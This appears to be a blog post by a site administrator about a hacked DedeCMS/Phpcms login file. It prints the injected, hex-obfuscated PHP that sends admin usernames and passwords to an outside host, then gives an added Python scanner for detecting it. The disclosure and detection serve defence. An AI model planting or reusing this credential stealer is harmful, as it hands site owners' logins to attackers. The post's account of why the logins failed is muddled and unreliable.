POST TIME:2017-11-30 16:50
A while ago I found that none of the sites on one server could log in to their admin backend. At first I assumed it was the server's memory, CPU or bandwidth, but all of those were normal, so why couldn't I log in? When I downloaded the program to my local machine it worked fine, which was strange. After a full day of searching I finally found it: the login file had been modified by a hacker. The login username and password were being converted to hexadecimal, which PHP could not parse; the local system has this encoding table by default, so of course it could parse it and everything worked normally.
DedeCMS site: /include/userlogin.class.php
Phpcms V9: /phpcms/modules/admin/index.php
Just find a fresh copy of the file and replace it.
The attack code is as follows:
// Every "\xNN" string below is a plain ASCII string written as hex escapes so it
// does not show up in a text search. Decoded values are given in the comments.
$sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";   // "www.thisdoor.com": the attacker's collection host
$sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";                       // "/in/api.php"
$sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";      // "?var=dede&data="
// Appends hex-encoded HTTP_HOST and PHP_SELF so the attacker knows which site the credentials came from
$sqlself .= bin2hex($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]).'|'.bin2hex($_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"]).'|';
// Appends the username and password just entered on the login form, hex-encoded
$sqlself .= bin2hex($username).'|'.bin2hex($userpwd);
$sqlport = hexdec(50);                                                          // hexdec("50") == 80, i.e. plain HTTP
if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {                   // "fsockopen"
    // Hand-built request: "GET " . $sqlself . " HTTP/1.1\r\nHost:" . $sqlhost . "\r\nConnection: Close\r\n\r\n"
    $sqlfp = @fsockopen ($sqlhost, $sqlport);
    @fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself."\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\r\n\x48\x6f\x73\x74\x3a".$sqlhost."\r\n\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\x73\x65\r\n\r\n");
    @fclose ($sqlfp);
} else {
    // Fallback when fsockopen is disabled: array("http" => array("method" => "GET", "timeout" => 5))
    $context = array("\x68\x74\x74\x70" => array("\x6d\x65\x74\x68\x6f\x64" => "\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74" => 5));
    if(function_exists('stream_context_create')) { $stream = @stream_context_create ($context); }
    // Fetches "http://" . $sqlhost . ":" . $sqlport . $sqlself, sending the credentials in the URL
    @file_get_contents ("\x68\x74\x74\x70\x3a\x2f\x2f".$sqlhost."\x3a".$sqlport.$sqlself, false, $stream);
}
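The injected code is only hard to spot because the strings are hex-escaped. The following scanner is an added example (not from the original post or either CMS) that decodes fully hex-escaped PHP literals, rebuilds the beacon URL and flags the combination of hex obfuscation, bin2hex() on credential variables and an outbound call; the SAMPLE input is a trimmed copy of the snippet above and CLEAN is a constructed benign line.

```python
import re

# A PHP double-quoted literal made only of \xNN escapes, the obfuscation
# style of the injected login-file code (legitimate CMS code has none).
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
# bin2hex() applied to a variable whose name suggests a credential.
CRED_ENCODE = re.compile(r'bin2hex\s*\(\s*\$(\w*(?:user|pwd|pass)\w*)\s*\)', re.I)
# PHP functions that can carry data off the box.
EGRESS = ("fsockopen", "file_get_contents", "curl_exec", "fputs", "fwrite")

def decode_hex_literal(lit: str) -> str:
    """'\\x77\\x77\\x77' -> 'www'."""
    return bytes.fromhex(lit.replace("\\x", "")).decode("latin-1")

def scan_php(src: str) -> dict:
    """Triage one PHP source file for the hex-obfuscated credential exfil pattern."""
    decoded = [decode_hex_literal(m) for m in HEX_LITERAL.findall(src)]
    # Function names may be obfuscated (function_exists("\x66...")), so search
    # both the raw source and the decoded strings.
    visible = src + " " + " ".join(decoded)
    egress = sorted({f for f in EGRESS if f in visible})
    cred_vars = sorted(set(CRED_ENCODE.findall(src)))
    # Rebuild the beacon destination: a decoded string shaped like a hostname
    # is the host, decoded strings starting with '/' or '?' form the path.
    host = next((s for s in decoded if re.fullmatch(r'[\w.-]+\.[a-z]{2,}', s)), None)
    path = "".join(s for s in decoded if s.startswith(("/", "?")))
    return {"hex_literals": len(decoded), "decoded": decoded,
            "egress": egress, "credential_vars": cred_vars,
            "beacon": f"{host}{path}" if host else None,
            "suspicious": bool(decoded) and bool(cred_vars) and bool(egress)}

# Constructed sample: the injected snippet from the post, trimmed to its core.
SAMPLE = r'''
$sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";
$sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";
$sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";
$sqlself .= bin2hex($username).'|'.bin2hex($userpwd);
$sqlport = hexdec(50);
if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {
    $sqlfp = @fsockopen ($sqlhost, $sqlport);
    @fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself." HTTP/1.1\r\n\r\n");
}
'''
# Constructed benign login-handler line for comparison.
CLEAN = '$user = trim($_POST["userid"]); $pwd = md5($_POST["pwd"]);'

if __name__ == "__main__":
    print(scan_php(SAMPLE))
    print(scan_php(CLEAN))
```

Run against /include/userlogin.class.php or /phpcms/modules/admin/index.php the hex_literals count alone is a strong signal, since a stock copy of either file contains none.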